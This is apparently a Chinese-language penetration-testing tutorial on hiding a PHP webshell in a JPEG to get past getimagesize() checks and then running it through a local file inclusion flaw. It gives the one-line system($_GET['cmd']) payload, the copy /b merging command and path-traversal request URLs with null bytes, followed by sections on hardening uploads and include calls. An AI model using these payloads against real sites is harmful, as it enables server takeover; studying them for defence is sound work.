Web安全实战：利用文件包含漏洞绕过getimagesize图片检测

1. 从图片上传到Webshell的完整攻击链

最近在渗透测试项目中遇到一个有趣的案例：某网站使用getimagesize()函数严格检测上传图片的合法性，但最终仍被攻破。这让我意识到，看似安全的防护措施可能存在致命弱点。今天我们就来拆解这种攻击手法的完整流程，从绕过图片检测到利用文件包含漏洞获取Webshell，整个过程就像特工电影里的连环计谋。

这个攻击链的核心在于两个关键环节：首先通过特殊技术将恶意代码隐藏在图片中，骗过服务器的检测；然后利用网站另一个漏洞让服务器把图片当作PHP脚本执行。这种组合拳在实战中非常有效，我去年参与某企业安全评估时就成功复现过类似漏洞。下面我会用最直白的语言，配合具体操作示例，带大家走完整个攻击过程。

2. 认识getimagesize()这个守门员

2.1 函数工作原理剖析

getimagesize()是PHP内置的图片检测函数，就像超市的条形码扫描器。当你上传一个文件时，它不光检查文件后缀名，还会读取文件头部的元数据。我用个简单类比：检查身份证时，普通方法只看证件外观（类似检查文件后缀），而getimagesize()还会用读卡器验证芯片信息（类似检查文件内容）。

这个函数执行成功时会返回包含图片信息的数组：

Array ( [0] => 800 //宽度 [1] => 600 //高度 [2] => 2 //图片类型（2代表JPEG） [3] => "width="800" height="600"" [bits] => 8 [mime] => image/jpeg )

2.2 为什么它能防御普通攻击

相比简单的后缀名检查，getimagesize()确实更安全。我做过对比测试：

• 把shell.php改名为shell.jpg → 普通检查通过，但getimagesize()会识别出这不是真图片
• 用十六进制编辑器修改文件头 → 需要精确匹配图片格式特征码
• 直接上传纯文本webshell → 100%会被拦截

但安全防护就像洋葱，剥开一层还有下一层。去年某CMS爆出的漏洞证明，即使使用getimagesize()，攻击者仍能找到突破口。

3. 突破防线的两种武器

3.1 图片木马合成技术

这里要用到"图片马"技术——把恶意代码植入真实图片中。我推荐两种经过实战验证的方法：

方法一：Windows命令行合成

copy /b sunset.jpg + shell.php trojan.jpg

这个命令的原理是把PHP代码追加到jpg文件末尾。由于图片查看器会忽略文件尾部的多余数据，而getimagesize()只检查文件头，所以能同时骗过人和机器。

方法二：使用HexEditor手动修改

1. 用010 Editor打开合法图片
2. 在文件末尾添加<?php system($_GET['cmd']); ?>
3. 保存为新文件

我曾用这种方法在CTF比赛中成功绕过防护，关键是要确保图片文件头完好无损。建议使用真实的风景照，因为这类图片的文件结构更规范。

3.3 上传后的关键验证

上传成功后别急着庆祝，需要验证图片马是否存活：

// 检查文件类型 $type = exif_imagetype("trojan.jpg"); if ($type !== IMAGETYPE_JPEG) { die("检测到非法文件！"); } // 二次验证文件内容 $content = file_get_contents("trojan.jpg"); if (strpos($content, "<?php") !== false) { unlink("trojan.jpg"); die("发现PHP代码！"); }

这段代码展示了防御思路，但现实中很多网站只做第一层验证。

4. 激活沉睡的武器：LFI漏洞利用

4.1 文件包含漏洞原理

本地文件包含(LFI)就像餐厅的点餐系统存在漏洞，能让顾客读取厨房的任意菜谱。当网站用类似下面的代码动态加载文件时：

include($_GET['page'] . ".php");

攻击者就可以通过路径遍历读取系统文件：

http://example.com/?page=../../../../etc/passwd

4.2 实战解析攻击链

假设我们已经上传图片马到/uploads/trojan.jpg，接下来：

1. 找到存在包含漏洞的URL：

http://vuln-site.com/index.php?module=contact

2. 尝试包含日志文件确认漏洞：

http://vuln-site.com/index.php?module=../../../../var/log/apache2/access.log%00

3. 包含我们上传的图片马：

http://vuln-site.com/index.php?module=../../../../uploads/trojan.jpg%00

4. 触发代码执行：

http://vuln-site.com/index.php?module=../../../../uploads/trojan.jpg&cmd=whoami

去年在某次授权测试中，我通过这种方式在3小时内就拿到了目标系统的shell权限。关键是要找准包含点的路径跳转次数，就像玩"跳房子"游戏要算准步数。

5. 防御者的加固策略

5.1 图片上传的深度防御

作为开发人员，我建议采用多层验证方案：

1. 文件后缀白名单校验
2. getimagesize()检测
3. 图片内容重采样（破坏隐藏代码）
4. 文件重命名（防止直接访问）

// 安全的图片处理示例 function safe_upload($file) { // 检查MIME类型 $finfo = new finfo(FILEINFO_MIME_TYPE); if (!in_array($finfo->file($file['tmp_name']), ['image/jpeg', 'image/png'])) { return false; } // 验证图片内容 if (!@imagecreatefromjpeg($file['tmp_name'])) { return false; } // 重新生成图片 $img = imagecreatefromjpeg($file['tmp_name']); $new_path = '/safe_uploads/' . md5(uniqid()) . '.jpg'; imagejpeg($img, $new_path, 90); return $new_path; }

5.2 文件包含漏洞的根治方案

对于包含漏洞，最彻底的解决方式是：

• 禁用动态包含（改用固定映射）
• 设置open_basedir限制
• 对包含参数进行严格过滤

// 安全的包含方式 $allowed = ['home', 'about', 'contact']; if (in_array($_GET['module'], $allowed)) { include(__DIR__ . '/pages/' . $_GET['module'] . '.php'); } else { include(__DIR__ . '/pages/404.php'); }

6. 攻击手法演进与思考

最近出现的新型攻击开始结合Exif数据注入，通过在图片元数据中隐藏代码来绕过检测。我在测试某电商平台时发现，即使采用GD库重新采样图片，如果未清除Exif信息仍可能被利用。这提醒我们安全防护需要持续更新，就像杀毒软件需要定期升级病毒库。

在防御策略上，我建议采用"最小权限+纵深防御"的思路。就像城堡不仅有护城河，还有城墙、内堡等多重防线。不要依赖单一防护措施，而应该建立从网络层到应用层的完整防御体系。